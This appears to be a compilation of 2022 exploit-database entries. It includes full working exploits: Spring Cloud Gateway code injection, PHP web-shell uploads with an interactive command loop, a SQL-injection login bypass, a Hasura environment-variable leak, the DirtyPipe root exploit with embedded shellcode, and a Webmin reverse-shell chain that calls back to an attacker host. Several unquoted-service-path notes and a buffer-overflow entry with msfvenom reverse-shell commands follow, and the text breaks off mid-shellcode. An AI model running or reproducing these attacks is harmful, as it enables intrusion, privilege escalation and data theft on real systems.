
  1. # Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 03/03/2022 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://spring.io/ # Software Link: https://spring.io/projects/spring-cloud-gateway # Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 # Tested on: 3.1.0 # CVE : CVE-2022-22947 import random import string import requests import json import sys import urllib.parse import base64 headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} proxies = { 'http': 'http://172.29.32.1:8081', 'https': 'http://172.29.32.1:8081', } id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) def exploit(url, command): payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) if(rbase.status_code == 201): print("[+] Stage deployed to /actuator/gateway/routes/"+id) print("[+] Executing command...") r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): print("[+] getting result...") r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): get_response = r.json() clean(url, id) return get_response['filters'][0].split("'")[1] else: print("[-] Error: Invalid response") clean(url, id) exit(1) else: clean(url, id) print("[-] Error executing command") def clean(url, id): remove 
= requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(remove.status_code == 200): print("[+] Stage removed!") else: print("[-] Error: Fail to remove stage") def banner(): print(""" ################################################### # # # Exploit for CVE-2022-22947 # # - Carlos Vieira (Crowsec) # # # # Usage: # # python3 exploit.py <url> <command> # # # # Example: # # python3 exploit.py http://localhost:8080 'id' # # # ################################################### """) def main(): banner() if len(sys.argv) != 3: print("[-] Error: Invalid arguments") print("[-] Usage: python3 exploit.py <url> <command>") exit(1) else: url = sys.argv[1] command = sys.argv[2] print(exploit(url, command)) if __name__ == '__main__': main()
  2. # Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) # Google Dork: NA # Date: 03/04/2022 # Exploit Author: Sunny Mehra @DSKMehra # Vendor Homepage: https://github.com/part-db/part-db # Software Link: https://github.com/part-db/part-db # Version: [ 0.5.11.] # Tested on: [KALI OS] # CVE : CVE-2022-0848 # --------------- #!/bin/bash host=127.0.0.1/Part-DB-0.5.10 #WEBHOST #Usage: Change host #Command: bash exploit.sh #EXPLOIT BY @DSKMehra echo "<?php system(id); ?>">POC.phtml #PHP Shell Code result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'` rm POC.phtml echo Shell Location : "$host/data/media/labels/$result"
  3. # Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE) # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError # Interface class to display terminal messages class Interface(): def __init__(self): self.red = '\033[91m' self.green = '\033[92m' self.white = '\033[37m' self.yellow = '\033[93m' self.bold = '\033[1m' self.end = '\033[0m' def header(self): print('\n >> Attendance and Payroll System v1.0') print(' >> Unauthenticated Remote Code Execution') print(' >> By pr0z\n') def info(self, message): print(f"[{self.white}*{self.end}] {message}") def warning(self, message): print(f"[{self.yellow}!{self.end}] {message}") def error(self, message): print(f"[{self.red}x{self.end}] {message}") def success(self, message): print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") upload_path = '/apsystem/admin/employee_edit_photo.php' shell_path = '/apsystem/images/shell.php' #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>" multipart_form_data = { 'id': 1, 'upload': (''), } files = {'photo': ('shell.php', shell_data)} output = Interface() output.header() # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: output.info("Usage: python3 rce.py http://127.0.0.1") sys.exit() # Upload the shell target = sys.argv[1] output.info(f"Uploading the web shell to {target}") r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) # Validating shell has been uploaded output.info(f"Validating the shell has been uploaded to {target}") r = requests.get(target + shell_path, verify=False) try: r = requests.get(target + shell_path) 
if r.status_code == 200: output.success('Successfully connected to web shell\n') else: raise Exception except ConnectionError: output.error('We were unable to establish a connection') sys.exit() except: output.error('Something unexpected happened') sys.exit() # Remote code execution while True: try: cmd = input("\033[91mRCE\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit() except ConnectionError: output.error('We lost our connection to the web shell') sys.exit() except: output.error('Something unexpected happened') sys.exit()
  4. # Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError print('\n >> Attendance and Payroll System v1.0') print(' >> Authentication Bypass through SQL injection') print(' >> By pr0z\n') login_path = '/apsystem/admin/login.php' index_path = '/apsystem/admin/index.php' payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login=" headers = {'Content-Type': 'application/x-www-form-urlencoded'} #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1") sys.exit() # Bypass Authentication target = sys.argv[1] print("[+] Extracting Administrator cookie using SQLi ...") sess = requests.Session() try: sess.get(target + index_path,headers=headers, verify=False) sess.post(target + login_path, data=payload, headers=headers,verify=False) except ConnectionError: print('[-] We were unable to establish a connection') sys.exit() cookie_val = sess.cookies.get_dict().get("PHPSESSID") print("[+] Use the following cookie:\n") print(f"PHPSESSID: {cookie_val}")
  5. # Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure # Software: Hasura GraphQL Community # Software Link: https://github.com/hasura/graphql-engine # Version: 2.2.0 # Exploit Author: Dolev Farhi # Date: 5/05/2022 # Tested on: Ubuntu import requests SERVER_ADDR = 'x.x.x.x' url = 'http://{}/v1/metadata'.format(SERVER_ADDR) print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') while True: env_var = input('Type environment variable key to leak.\n> ') if not env_var: continue payload = { "type": "bulk", "source": "", "args": [ { "type": "add_remote_schema", "args": { "name": "ttt", "definition": { "timeout_seconds": 60, "forward_client_headers": False, "headers": [], "url_from_env": env_var }, "comment": "" } } ], "resource_version": 2 } r = requests.post(url, json=payload) try: print(r.json()['error'].split('not a valid URI:')[1]) except IndexError: print('Could not parse out VAR, dumping error as is') print(r.json().get('error', 'N/A'))
  6. # Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path # Date: 04/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.privateinternetaccess.com # Software Link: https://www.privateinternetaccess.com/download # Version: 3.3.0.100 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz # Steps to discover the Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc PrivateInternetAccessService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PrivateInternetAccessService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Private Internet Access Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the service path to actually be unquoted and the local user to be able to place an executable of their own in one of the directories that Windows tries while resolving a space-containing, unquoted path, undetected by the OS or other security applications, so that it is executed in place of the intended binary when the service starts at boot. Note that both the wmic output and the sc qc output above already show the PathName / BINARY_PATH_NAME enclosed in double quotes, so the configuration as listed does not contain an unquoted path; confirm the quoting on the installed service before treating it as vulnerable. On a default installation, standard users cannot create files in C:\ or under Program Files, so even an unquoted path is only exploitable where those directory permissions have been weakened; checking the ACLs of each directory on the path is the first triage step, and the remediation is to quote the path in the service configuration. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem.
  7. # Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cloudflare.com/ # Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/ # Version: 1.4.107 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CloudflareWARP [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CloudflareWARP TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cloudflare WARP DEPENDENCIES : wlansvc SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to place an executable of their own in one of the directories that Windows tries while resolving the unquoted, space-containing BINARY_PATH_NAME shown above, undetected by the OS or other security applications, so that it is executed in place of the intended binary when the service starts at boot. On a default installation, standard users cannot create files in C:\ or under Program Files, so this is only exploitable where those directory permissions have been weakened; checking the ACLs of each directory on the path is the first triage step, and the remediation is to quote the path in the service configuration. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem.
  8. # Exploit Title: Malwarebytes 4.5 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.malwarebytes.com/ # Software Link: https://www.malwarebytes.com/mwb-download/ # Version: 4.5.0 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc MBAMService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MBAMService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Malwarebytes Service DEPENDENCIES : RPCSS : WINMGMT SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to place an executable of their own in one of the directories that Windows tries while resolving the unquoted, space-containing BINARY_PATH_NAME shown above, undetected by the OS or other security applications, so that it is executed in place of the intended binary when the service starts at boot. On a default installation, standard users cannot create files in C:\ or under Program Files, so this is only exploitable where those directory permissions have been weakened; checking the ACLs of each directory on the path is the first triage step, and the remediation is to quote the path in the service configuration. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem.
  9. # Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.foxit.com/pdf-reader/ # Software Link: https://www.foxit.com/downloads/#Foxit-Reader/ # Version: 11.0.1.49938 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc FoxitReaderUpdateService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FoxitReaderUpdateService TYPE : 110 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Foxit PDF Reader Update Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to place an executable of their own in one of the directories that Windows tries while resolving the unquoted, space-containing BINARY_PATH_NAME shown above, undetected by the OS or other security applications, so that it is executed in place of the intended binary when the service starts at boot. On a default installation, standard users cannot create files in C:\ or under the Program Files tree, so this is only exploitable where those directory permissions have been weakened; checking the ACLs of each directory on the path is the first triage step, and the remediation is to quote the path in the service configuration. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem.
  10. // Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) // Exploit Author: blasty ([email protected]) // Original Author: Max Kellermann ([email protected]) // CVE: CVE-2022-0847 /* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <[email protected]> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. 
* * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #include <stdint.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif // small (linux x86_64) ELF file matroshka doll that does; // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); // write(fd, elfcode, elfcode_len) // chmod("/tmp/sh", 04755) // close(fd); // exit(0); // // the dropped ELF simply does: // setuid(0); // setgid(0); // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); unsigned char elfcode[] = { /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 
0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 }; /** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */ static void prepare_pipe(int p[2]) { if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? 
sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */ } int hax(char *filename, long offset, uint8_t *data, size_t len) { /* open the input file and validate the specified offset */ const int fd = open(filename, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return -1; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return -1; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return -1; } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return -1; } /* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, len); if (nbytes < 0) { perror("write failed"); return -1; } if ((size_t)nbytes < len) { fprintf(stderr, "short write\n"); return -1; } close(fd); return 0; } int main(int argc, char **argv) { if (argc != 2) { fprintf(stderr, "Usage: %s SUID\n", argv[0]); return EXIT_FAILURE; } char *path = argv[1]; uint8_t *data = elfcode; int fd = open(path, O_RDONLY); uint8_t *orig_bytes = malloc(sizeof(elfcode)); lseek(fd, 1, SEEK_SET); read(fd, orig_bytes, sizeof(elfcode)); close(fd); printf("[+] hijacking suid binary..\n"); if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] dropping suid shell..\n"); system(path); printf("[+] restoring suid binary..\n"); if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; 
} printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); system("/tmp/sh"); return EXIT_SUCCESS; }
  11. # Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated) # Date: 2022-03-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.webmin.com/ # Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip # Version: <= 1.984 # Tested on: Ubuntu 18 # Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell #!/usr/bin/python3 """ Coded by: @faisalfs10x GitHub: https://github.com/faisalfs10x Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ """ import requests import urllib3 import argparse import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TGREEN = '\033[32m' TRED = '\033[31m' TCYAN = '\033[36m' TSHELL = '\033[32;1m' ENDC = '\033[m' class Exploit(object): def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): self.target = target self.username = username self.password = password self.py3http_server = py3http_server self.pyhttp_port = pyhttp_port self.upload_path = upload_path self.callback_ip = callback_ip self.callback_port = callback_port self.fname = fname #self.proxies = proxies self.s = requests.Session() def gen_payload(self): payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) f = open(f"{self.fname}", "w") f.write(payload) f.close() def login(self): login_url = self.target + "/session_login.cgi" cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } data = { 'user' : self.username, 'pass' : self.password } try: r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) 
success_message = 'System hostname' if success_message in r.text: print(TGREEN + "[+] Login Successful", ENDC) else: print(TRED +"[-] Login Failed", ENDC) exit() except requests.Timeout as e: print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) exit() def pyhttp_server(self): print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up print('[+] Sleep 3 second to ensure http server is up!') time.sleep(3) # Sleep for 3 seconds to ensure http server is up! def download_remote_url(self): download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": self.target + "/filemin/?xnavigation=1" } data = { 'link': "http://" + self.py3http_server + "/" + self.fname, 'username': '', 'password': '', 'path': self.upload_path } r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") def modify_permission(self): modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" headers = { "Referer": self.target + "/filemin/?xnavigation=1" } data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"[+] Modifying permission of {self.fname} to 0755") def exec_revshell(self): url = self.target + '/' + self.fname try: r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! 
print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) print("[+] Shell location: " + url) else: print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) def do_cleanup(self): print(TCYAN + '\n[+] Cleaning up ') print(f'[+] Killing: http.server on port {self.pyhttp_port}') os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') exit() def run(self): self.gen_payload() self.login() self.pyhttp_server() self.download_remote_url() self.modify_permission() self.exec_revshell() self.do_cleanup() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() target = args.target username = args.credential.split(':')[0] password = args.credential.split(':')[1] py3http_server = args.py3http_server pyhttp_port = py3http_server.split(':')[1] callback_ip = args.callback_ip callback_port = args.callback_port upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method. fname = "revshell.cgi" # CGI script name, you may change to different name pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run()
  12. # Exploit Title: Cobian Backup 0.9 - Unquoted Service Path # Date: 06/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cobiansoft.com// # Software Link: https://www.cobiansoft.com/download.php/ # Version: 0.9.93 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CobianReflectorService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CobianReflectorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cobian Reflector Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to place an executable of their own in one of the directories that Windows tries while resolving the unquoted, space-containing BINARY_PATH_NAME shown above, undetected by the OS or other security applications, so that it is executed in place of the intended binary when the service starts at boot. On a default installation, standard users cannot create files in C:\ or under Program Files, so this is only exploitable where those directory permissions have been weakened; checking the ACLs of each directory on the path is the first triage step, and the remediation is to quote the path in the service configuration. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem.
  13. # Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.07.2022 # Software Link: https://www.litexmedia.com/acwizard.exe # Tested Version: v2.01 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 push_esp = p32(0x1004dbff) #push esp ret ret from id3lib.dll nops = "\x90" * 15#515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += 